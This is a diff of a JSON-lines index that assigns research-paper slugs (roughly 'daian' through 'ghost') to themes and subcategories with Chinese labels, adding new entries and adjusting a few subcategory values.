{"slug":"daian-flash-boys-2020","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"dalle-2","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生成模型 / 计算机视觉","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"danezis-sphinx-2009","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"dap-spec","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"dapper-2010","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"dash-numa-1992","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"dataflow-model-2015","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"datesat-a-framework-for-solving-date-and-period-constraints-arxiv-2605-25180","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"davis-putnam-1960","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"dcn-2017","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"ddim-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} @@ -211,13 +261,19 @@ {"slug":"debate-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"deberta-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"debevec-1998-rendering-with-natural-light","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"debug-adapter-protocol","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"debugging-dichotomy","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程实证","source":"category","confidence":"high","rawCategory":"其他"} {"slug":"decision-transformer-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"deep-research-harness-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"deepseek-coder-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"deepseek-r1","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"deepspeed-inference-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"deepspeed-zero","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"deering-1988-triangle-processor","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"delta-lake-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"现代数据库","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"demikernel-2021","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"demystifying-data-org","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"demystifying-data-organization-for-enhanced-llm-training-arxiv-2605-30334","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"denali-2002","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"dense360-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"desbrun-1999-implicit-fairing","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} @@ -225,16 +281,22 @@ {"slug":"differential-datalog","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"diffie-hellman-1976","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"diffie-hellman","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码学","source":"category","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"diffusion-perceptual-loss","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"扩散模型","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"diffusion-posterior-finite","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"dijkstra-1965","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"dijkstra-goto-1968","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"dijkstra-goto","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程 / 控制流理论","source":"category","confidence":"high","rawCategory":"其他"} {"slug":"dijkstra-shortest-path","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"算法","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"din-2018","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"dingledine-mixminion-2003","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"dino","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"自监督视觉","source":"slugOverrides","confidence":"high","rawCategory":"机器学习"} {"slug":"disco-1997","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"discrete-dist-net","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生成模型","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"disel-2018","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"diskann-2019","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"disney-brdf-2012","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"distributed-snapshot-byzantine-2026","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"distserve-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"distserve","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"dit","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生成模型","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"dlrm-2019","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} @@ -242,16 +304,20 @@ {"slug":"doc2query-2019","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"doligez-leroy-concurrent-gc","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"donar-2010","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"dora-state-of-devops-2023","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"dot-doh-perf-2020","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"double-descent-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"dpdk-poll-mode-driver","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"dpll-1962","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} -{"slug":"dpo","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"NLP","source":"category","confidence":"high","rawCategory":"NLP"} +{"slug":"dpo","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"NLP"} {"slug":"dpr-2020","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"dqn","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"强化学习","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"dreamfusion-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"dremel-decade-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"drizzle-2017","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"drmm-2016","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} -{"slug":"dropout-2014","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"dropout-2014","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"ds-zero-pp-comm","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"dspy","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"dssm-2013","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"dstreams-2013","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} @@ -259,39 +325,61 @@ {"slug":"duchi-local-dp-2013","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"duckdb-2019","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"dwork-calibrating-noise-2006","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"dwork-differential-privacy-2006","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"dwork-dp-icalp-2006","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"dwork-our-data-ourselves-2006","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"dynamo-2000","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"dynamo-amazon-2007","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"dynamo","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} +{"slug":"e-path-egraph","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"e-path-equality-saturation-for-control-flow-graphs-arxiv-2605-28694","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"e5-2022","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"eagle","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"earley-parser","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"easycrypt-2011","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"ebpf-linux-runtime-2024","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"ebpf","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"操作系统","source":"category","confidence":"high","rawCategory":"操作系统"} +{"slug":"ed25519-2011","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"edm-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"effect-handlers","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"efficient-compile-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"effiskill","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"eg-walker-collab-text-2024","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"egglog-incremental-2026","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"egoschema-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"electra-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"elmo-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"emage-gesture","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"姿态生成","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"embassy-async-rust-embedded","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"emqx","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"infrastructure","source":"category","confidence":"high","rawCategory":"基础设施"} +{"slug":"entity-tracking-states","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"epaxos-2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"epoch-based-reclamation-2007","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"erlang-otp","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言 / 分布式系统","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"erlingsson-rappor-2014","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"eros-1999","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"esmfold-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生物信息","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"esp-idf-overview","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"eswaran-1976","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"esx-memory-2002","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"ethane-2007","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"eureka-agent","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体","source":"candidates.topic+category","confidence":"high","rawCategory":"Agent"} {"slug":"eve-agent-evidence","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"evidence-memorization","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"LLM记忆","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"evo-memory-2511","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"evorepair-vulnerability-repair-via-self-evolution-arxiv-2605-30105","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"exg-experience-graphs","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"exokernel-1995","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"expertflow-moe-offload","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"f1-2013","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"f4-2014","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"faiss-2017","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"fan-vercauteren-bfv-2012","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"farm-2015","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"farsite-2002","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"fast-paxos-2006","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"fastertransformer-2021","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"fastlanes-compression","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"fat-tree-2008","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"feautrier-polyhedral","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"fermi-architecture-2010","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} @@ -300,21 +388,30 @@ {"slug":"fielding-rest-2000","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"filip-2021","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"firecracker-2020","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"firecracker-microvm-2020","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"first-class-refinement-scala","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"flamingo-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"flan-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"flash-attention","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 与系统","source":"category","confidence":"high","rawCategory":"图形学"} {"slug":"flash-vstream-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"flashattention-2","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"flashattention-3-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"flashinfer-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"flat-datacenter-storage","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"flexgen-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"flexible-paxos-2016","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"flexsc-2010","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"flink-2015","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"flink-snapshots-2015","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"flp-1985","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"fort-searcher","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"搜索智能体","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"foundationdb-2021","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"fpga-hls-2011","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"frama-c-2012","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"frangipani-1997","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"frank-effects","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"freedman-psi-2004","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"freertos-overview","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"frenetic-2011","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"fsdp-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"fsrs-spaced-repetition","area":"papers","theme":"其他","themeId":"other","subcategory":"学习与认知","source":"category","confidence":"high","rawCategory":"其他"} @@ -326,20 +423,24 @@ {"slug":"gao-2001-as-relations","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"garland-heckbert-1997-qem","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"gat-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"gated-deltanet-2","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"gbrank-2007","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"gcc-webrtc-2016","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"gcn-2017","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"gemini-1.5-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"多模态 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"generational-gc","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"gentry-fhe-2009","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"george-appel-1996","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"gfs","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"ghost-2021","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} 